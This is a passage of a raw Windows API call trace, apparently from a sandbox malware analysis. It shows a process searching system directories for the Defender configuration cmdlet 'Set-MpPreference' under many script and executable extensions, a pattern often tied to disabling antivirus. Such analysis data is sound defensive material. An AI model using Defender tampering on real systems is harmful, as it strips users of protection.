lpFindFileData=0x3b7120) returned 0xffffffff [0150.187] GetLastError () returned 0x2 [0150.187] SetErrorMode (uMode=0x1) returned 0x1 [0150.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.187] GetLastError () returned 0x2 [0150.187] SetErrorMode (uMode=0x1) returned 0x1 [0150.187] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBS", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.187] GetLastError () returned 0x2 [0150.187] SetErrorMode (uMode=0x1) returned 0x1 [0150.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.187] GetLastError () returned 0x2 [0150.187] SetErrorMode (uMode=0x1) returned 0x1 [0150.188] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.188] GetLastError () returned 0x2 [0150.188] SetErrorMode (uMode=0x1) returned 0x1 [0150.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.188] GetLastError () returned 0x2 [0150.188] SetErrorMode (uMode=0x1) returned 0x1 [0150.188] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JS", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.188] GetLastError () returned 0x2 [0150.188] SetErrorMode (uMode=0x1) returned 0x1 [0150.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.188] GetLastError () returned 0x2 [0150.188] SetErrorMode (uMode=0x1) returned 0x1 [0150.189] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JSE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.189] GetLastError () returned 0x2 [0150.189] SetErrorMode (uMode=0x1) returned 0x1 [0150.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.189] GetLastError () returned 0x2 [0150.189] SetErrorMode (uMode=0x1) returned 0x1 [0150.189] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSF", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.189] GetLastError () returned 0x2 [0150.189] SetErrorMode (uMode=0x1) returned 0x1 [0150.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.189] GetLastError () returned 0x2 [0150.189] SetErrorMode (uMode=0x1) returned 0x1 [0150.189] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSH", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.190] GetLastError () returned 0x2 [0150.190] SetErrorMode (uMode=0x1) returned 0x1 [0150.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.190] GetLastError () returned 0x2 [0150.190] SetErrorMode (uMode=0x1) returned 0x1 [0150.190] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.MSC", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.190] GetLastError () returned 0x2 [0150.190] SetErrorMode (uMode=0x1) returned 0x1 [0150.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.190] GetLastError () returned 0x2 [0150.190] SetErrorMode (uMode=0x1) returned 0x1 [0150.190] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.191] GetLastError () returned 0x2 [0150.191] SetErrorMode (uMode=0x1) returned 0x1 [0150.191] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.191] GetLastError () returned 0x2 [0150.191] SetErrorMode (uMode=0x1) returned 0x1 [0150.191] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.ps1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.191] GetLastError () returned 0x2 [0150.191] SetErrorMode (uMode=0x1) returned 0x1 [0150.191] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.191] GetLastError () returned 0x2 [0150.191] SetErrorMode (uMode=0x1) returned 0x1 [0150.192] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psm1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.192] GetLastError () returned 0x2 [0150.192] SetErrorMode (uMode=0x1) returned 0x1 [0150.192] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.192] GetLastError () returned 0x2 [0150.192] SetErrorMode (uMode=0x1) returned 0x1 [0150.192] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psd1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.192] GetLastError () returned 0x2 [0150.192] SetErrorMode (uMode=0x1) returned 0x1 [0150.192] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.192] GetLastError () returned 0x2 [0150.192] SetErrorMode (uMode=0x1) returned 0x1 [0150.193] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.COM", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.193] GetLastError () returned 0x2 [0150.193] SetErrorMode (uMode=0x1) returned 0x1 [0150.193] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.193] GetLastError () returned 0x2 [0150.193] SetErrorMode (uMode=0x1) returned 0x1 [0150.193] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.EXE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.193] GetLastError () returned 0x2 [0150.193] SetErrorMode (uMode=0x1) returned 0x1 [0150.193] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.193] GetLastError () returned 0x2 [0150.193] SetErrorMode (uMode=0x1) returned 0x1 [0150.193] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.BAT", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.194] GetLastError () returned 0x2 [0150.194] SetErrorMode (uMode=0x1) returned 0x1 [0150.194] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.194] GetLastError () returned 0x2 [0150.194] SetErrorMode (uMode=0x1) returned 0x1 [0150.194] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.CMD", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.194] GetLastError () returned 0x2 [0150.194] SetErrorMode (uMode=0x1) returned 0x1 [0150.194] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.194] GetLastError () returned 0x2 [0150.194] SetErrorMode (uMode=0x1) returned 0x1 [0150.194] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBS", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.194] GetLastError () returned 0x2 [0150.195] SetErrorMode (uMode=0x1) returned 0x1 [0150.195] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.195] GetLastError () returned 0x2 [0150.195] SetErrorMode (uMode=0x1) returned 0x1 [0150.195] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.195] GetLastError () returned 0x2 [0150.195] SetErrorMode (uMode=0x1) returned 0x1 [0150.195] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.195] GetLastError () returned 0x2 [0150.195] SetErrorMode (uMode=0x1) returned 0x1 [0150.195] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JS", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.195] GetLastError () returned 0x2 [0150.195] SetErrorMode (uMode=0x1) returned 0x1 [0150.195] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.195] GetLastError () returned 0x2 [0150.196] SetErrorMode (uMode=0x1) returned 0x1 [0150.196] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JSE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.196] GetLastError () returned 0x2 [0150.196] SetErrorMode (uMode=0x1) returned 0x1 [0150.196] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.196] GetLastError () returned 0x2 [0150.196] SetErrorMode (uMode=0x1) returned 0x1 [0150.196] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSF", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.196] GetLastError () returned 0x2 [0150.196] SetErrorMode (uMode=0x1) returned 0x1 [0150.196] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.196] GetLastError () returned 0x2 [0150.196] SetErrorMode (uMode=0x1) returned 0x1 [0150.197] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSH", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.197] GetLastError () returned 0x2 [0150.197] SetErrorMode (uMode=0x1) returned 0x1 [0150.197] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.197] GetLastError () returned 0x2 [0150.197] SetErrorMode (uMode=0x1) returned 0x1 [0150.197] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.MSC", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.197] GetLastError () returned 0x2 [0150.197] SetErrorMode (uMode=0x1) returned 0x1 [0150.197] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.197] GetLastError () returned 0x2 [0150.197] SetErrorMode (uMode=0x1) returned 0x1 [0150.197] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.198] GetLastError () returned 0x2 [0150.198] SetErrorMode (uMode=0x1) returned 0x1 [0150.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.198] GetLastError () returned 0x2 [0150.198] SetErrorMode (uMode=0x1) returned 0x1 [0150.198] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.ps1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.199] GetLastError () returned 0x2 [0150.199] SetErrorMode (uMode=0x1) returned 0x1 [0150.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.200] GetLastError () returned 0x2 [0150.200] SetErrorMode (uMode=0x1) returned 0x1 [0150.200] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psm1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.201] GetLastError () returned 0x2 [0150.201] SetErrorMode (uMode=0x1) returned 0x1 [0150.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.201] GetLastError () returned 0x2 [0150.201] SetErrorMode (uMode=0x1) returned 0x1 [0150.202] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psd1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.203] GetLastError () returned 0x2 [0150.203] SetErrorMode (uMode=0x1) returned 0x1 [0150.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.203] GetLastError () returned 0x2 [0150.203] SetErrorMode (uMode=0x1) returned 0x1 [0150.203] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.COM", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.205] GetLastError () returned 0x2 [0150.205] SetErrorMode (uMode=0x1) returned 0x1 [0150.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.205] GetLastError () returned 0x2 [0150.205] SetErrorMode (uMode=0x1) returned 0x1 [0150.205] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.EXE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.207] GetLastError () returned 0x2 [0150.207] SetErrorMode (uMode=0x1) returned 0x1 [0150.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.207] GetLastError () returned 0x2 [0150.207] SetErrorMode (uMode=0x1) returned 0x1 [0150.207] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.BAT", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.208] GetLastError () returned 0x2 [0150.209] SetErrorMode (uMode=0x1) returned 0x1 [0150.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.209] GetLastError () returned 0x2 [0150.209] SetErrorMode (uMode=0x1) returned 0x1 [0150.209] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.CMD", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.210] GetLastError () returned 0x2 [0150.210] SetErrorMode (uMode=0x1) returned 0x1 [0150.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.210] GetLastError () returned 0x2 [0150.210] SetErrorMode (uMode=0x1) returned 0x1 [0150.211] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBS", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.212] GetLastError () returned 0x2 [0150.212] SetErrorMode (uMode=0x1) returned 0x1 [0150.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.212] GetLastError () returned 0x2 [0150.212] SetErrorMode (uMode=0x1) returned 0x1 [0150.212] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.214] GetLastError () returned 0x2 [0150.214] SetErrorMode (uMode=0x1) returned 0x1 [0150.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.214] GetLastError () returned 0x2 [0150.214] SetErrorMode (uMode=0x1) returned 0x1 [0150.214] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JS", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.216] GetLastError () returned 0x2 [0150.216] SetErrorMode (uMode=0x1) returned 0x1 [0150.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.216] GetLastError () returned 0x2 [0150.216] SetErrorMode (uMode=0x1) returned 0x1 [0150.216] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JSE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.218] GetLastError () returned 0x2 [0150.218] SetErrorMode (uMode=0x1) returned 0x1 [0150.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.218] GetLastError () returned 0x2 [0150.218] SetErrorMode (uMode=0x1) returned 0x1 [0150.218] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSF", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.219] GetLastError () returned 0x2 [0150.219] SetErrorMode (uMode=0x1) returned 0x1 [0150.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.219] GetLastError () returned 0x2 [0150.220] SetErrorMode (uMode=0x1) returned 0x1 [0150.220] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSH", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.221] GetLastError () returned 0x2 [0150.221] SetErrorMode (uMode=0x1) returned 0x1 [0150.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.221] GetLastError () returned 0x2 [0150.221] SetErrorMode (uMode=0x1) returned 0x1 [0150.221] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.MSC", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.251] GetLastError () returned 0x2 [0150.251] SetErrorMode (uMode=0x1) returned 0x1 [0150.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.252] GetLastError () returned 0x2 [0150.252] SetErrorMode (uMode=0x1) returned 0x1 [0150.252] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.253] GetLastError () returned 0x2 [0150.253] SetErrorMode (uMode=0x1) returned 0x1 [0150.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.253] GetLastError () returned 0x2 [0150.253] SetErrorMode (uMode=0x1) returned 0x1 [0150.254] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.ps1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.254] GetLastError () returned 0x2 [0150.254] SetErrorMode (uMode=0x1) returned 0x1 [0150.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.254] GetLastError () returned 0x2 [0150.254] SetErrorMode (uMode=0x1) returned 0x1 [0150.254] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psm1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.254] GetLastError () returned 0x2 [0150.254] SetErrorMode (uMode=0x1) returned 0x1 [0150.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.254] GetLastError () returned 0x2 [0150.254] SetErrorMode (uMode=0x1) returned 0x1 [0150.255] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psd1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.255] GetLastError () returned 0x2 [0150.255] SetErrorMode (uMode=0x1) returned 0x1 [0150.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.255] GetLastError () returned 0x2 [0150.255] SetErrorMode (uMode=0x1) returned 0x1 [0150.255] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.COM", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.255] GetLastError () returned 0x2 [0150.255] SetErrorMode (uMode=0x1) returned 0x1 [0150.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.255] GetLastError () returned 0x2 [0150.255] SetErrorMode (uMode=0x1) returned 0x1 [0150.255] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.EXE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.256] GetLastError () returned 0x2 [0150.256] SetErrorMode (uMode=0x1) returned 0x1 [0150.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.256] GetLastError () returned 0x2 [0150.256] SetErrorMode (uMode=0x1) returned 0x1 [0150.256] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.BAT", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.256] GetLastError () returned 0x2 [0150.256] SetErrorMode (uMode=0x1) returned 0x1 [0150.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.256] GetLastError () returned 0x2 [0150.256] SetErrorMode (uMode=0x1) returned 0x1 [0150.256] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.CMD", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.256] GetLastError () returned 0x2 [0150.257] SetErrorMode (uMode=0x1) returned 0x1 [0150.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.257] GetLastError () returned 0x2 [0150.257] SetErrorMode (uMode=0x1) returned 0x1 [0150.257] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBS", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.257] GetLastError () returned 0x2 [0150.257] SetErrorMode (uMode=0x1) returned 0x1 [0150.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.257] GetLastError () returned 0x2 [0150.257] SetErrorMode (uMode=0x1) returned 0x1 [0150.257] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.258] GetLastError () returned 0x2 [0150.258] SetErrorMode (uMode=0x1) returned 0x1 [0150.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.258] GetLastError () returned 0x2 [0150.258] SetErrorMode (uMode=0x1) returned 0x1 [0150.258] FindFirstFileW (in: 